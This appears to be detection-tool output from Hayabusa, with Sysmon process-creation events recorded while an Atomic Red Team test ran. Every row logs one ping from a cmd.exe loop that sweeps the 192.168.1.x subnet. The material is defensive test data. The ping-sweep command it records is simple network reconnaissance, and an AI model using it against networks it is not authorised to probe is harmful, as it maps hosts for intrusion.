2019-07-19 23:52:52.009 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.155  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:52.553 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.156  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:53.037 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.157  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:53.555 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.158  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:54.026 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.159  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:54.529 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.160  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:54.999 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.161  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:55.533 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.162  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:56.017 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.163  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:56.507 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.164  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:57.003 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.165  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:57.544 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.166  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:58.011 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.167  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:58.563 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.168  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:59.016 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.169  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:59.522 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.170  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:00.077 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.171  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:00.621 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.172  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:01.018 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.173  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:01.515 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.174  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:02.019 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.175  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:02.556 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.176  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:03.031 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.177  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:03.557 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.178  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:04.044 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.179  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:04.539 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.180  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:05.023 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.181  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:05.517 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.182  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:06.023 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.183  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:06.535 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.184  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:07.047 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.185  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:07.533 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.186  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:07.912 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.187  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:08.521 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.188  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:09.043 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.189  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:09.515 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.190  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:10.036 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.191  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:10.556 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.192  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:11.022 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.193  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:11.504 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.194  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:12.040 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.195  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:12.537 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.196  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:13.022 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.197  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:13.509 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.198  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:14.020 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.199  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:14.513 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.200  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:15.001 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.201  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:15.518 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.202  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:16.026 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.203  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:16.521 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.204  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:17.037 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.205  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:17.438 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.206  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:18.043 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.207  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:18.544 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.208  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
